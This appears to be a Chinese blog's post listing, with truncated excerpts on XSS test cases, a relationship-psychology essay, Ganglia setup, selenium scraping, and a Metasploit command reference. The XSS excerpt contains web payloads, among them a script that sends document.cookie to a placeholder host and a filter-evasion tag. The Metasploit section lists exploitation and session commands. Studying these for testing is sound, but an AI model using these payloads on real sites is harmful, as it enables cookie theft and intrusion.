xss测试用例

Roy
摘录于《XSS跨站脚本攻击剖析与防御》,希望大家支持正版,写的还是不错的。 <script>alert(1);</script> <script>alert('xss');</script> <script src="xxx://xxx.xxx"></script> <script>location.href="xxx://xxx.xx/cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('xss');</scr<script>ipt> <script>alert(String.

不可被证明的爱

Roy

文/丛非从

自我价值感低的人,往往需要被证明才能相信自己被爱,而且证明需要持续不断。而恰恰又是这些证明,将爱渐渐淡化。无数在感情里挫败着的人,经历着这样的悲剧故事。

这很像那个笑话,某女不相信自己是被丈夫爱也不相信自己值得被丈夫专一的,所以总是去验证丈夫的专一:每天回来都要搜索丈夫身上有没有女人的头发。直到没有搜到,还是嚎啕大哭,丈夫不解的问到没有搜到女人头发证明我很专一,你还哭个啥。该女的一席话曾让无数人汗颜:你这挨千刀的,在外面居然连尼姑也要了。

笑归笑,这样的故事我们身边又何尝是少数。潜意识里就不相信自己是被爱的,所以总要证明自己是被爱的,或者证明自己是被爱的。前者的故事很多,某个女孩偶然间知道男友的密码是自己的生日,欣喜若狂,证明了自己是被爱的,然后通过追问需要进一步证明:你是什么时候设的啊。对方答忘了。大约几月呢。对方答忘了。是年前呢还是年后呢……面对这样的追问,不知道听的人会有什么感受。当问的人不能持续证明到自己是被爱的,就开始失落:他是不是不爱我了。后者的故事也很有趣:当我故意关机2个小时,你知道我这段时间关机并且着急才能证明你是爱我的。我手机停机了你主动给我交话费才是爱我的,我过生日你主动记得我生日而且给我买玫瑰花才是爱我的。只有你做了XX,你才是爱我的,如果你没做XX,证明你不是真心爱我。当然,他们的话术常常不是这样,而是:你爱我,就应该……。例如你爱我,就应该每天给我打一个电话。还有更省略的:恋爱不就应该天天联系吗?恋爱不就应该彼此分享所有故事吗?

爱总是需要被证明,才相信爱。如果有一次不能被证明,则就会陷入恐慌。

centos部署Ganglia

Roy
Ganglia+RRDTool这对组合可以说是不错的机群监控软件了,在centos6下安装是十分简单的,服务端安装 yum install rrdtool-devel yum install ganglia-gmetad yum install ganglia-web 然后配置文件基本不用大量修改,位于/etc/ganglia/gmetad.

python+selenium+phantomjs抓取ajax动态页面

Roy
一般情况下,python爬虫遇到ajax动态页面一般都是直接分析后模拟ajax请求获得数据。不过今天遇到个网站,由于某些原因不透露网址了,点击搜索按钮后,它先跳转到a页面,然后从a页面跳转到b页面,再由b页面跳回a页面。当完成这2次跳转后,ajax向a页面提交的请求才会返回结果。 也怀疑是不是cookie或者refenen的问题,但最终证实不是因为这个。即便伪造了请求头再访问a页面,返回的也不是真实的结果页面而是一段跳转到b页面的js代码。 既然不知道跳转过程中网站到底干了写什么,那就直接上大杀器吧。 phantomjs可以简单的理解为js解释器,selenium更不用多介绍了,用pip安装即可。 从 http://phantomjs.org/download.html 下载编译后的包(当然你可以自己下源码),解压后的bin目录中就是我们需要的东西。 import sys reload(sys) sys.

metasploit命令参考

Roy
节选自《metasploit渗透测试指南》 show exploits 列出所有渗透攻击模块 show payloads 列出所有攻击载荷 show auxiliary 列出所有辅助模块 search name 搜索 info 列出详细信息 use name 使用 show options 查看参数 show targets 查看某模块支持的目标平台 show advanced 查看高级选项 set autorunscript migrate -f 攻击完成后自动迁移到另一个进程 check 检测目标是否对选定的渗透攻击存在相应的漏洞 exploit 执行渗透攻击 exploit -j 后台执行 exploit -z 成功渗透后不与会话交互 exploit -e encoder 指定攻击载荷编码方式 exploit -h 帮助 sessions -l 列出多个会话 sessions -l -v 列出会话同时列出详细信息 sessions -s scritp 在所有活跃会话中执行特定meterpreter脚本 sessions -K 杀死所有活跃会话 sessions -c cmd 在所有活跃会话上执行某命定 sessions -u sessionID 升级一个普通的win shell 到 meterpreter shell db_conreate name 创建数据库 db_connect name 链接数据库 db_namp 把namp的扫描结果存入数据库 hosts services查看结果 db_autopwn -h db_autopwn -p -r-e 对发现的所有端口执行db_autopwn db_destroy 删除当前数据库 db_destory user:pswd@host:port/dbname db_status 查看 meterpreter命令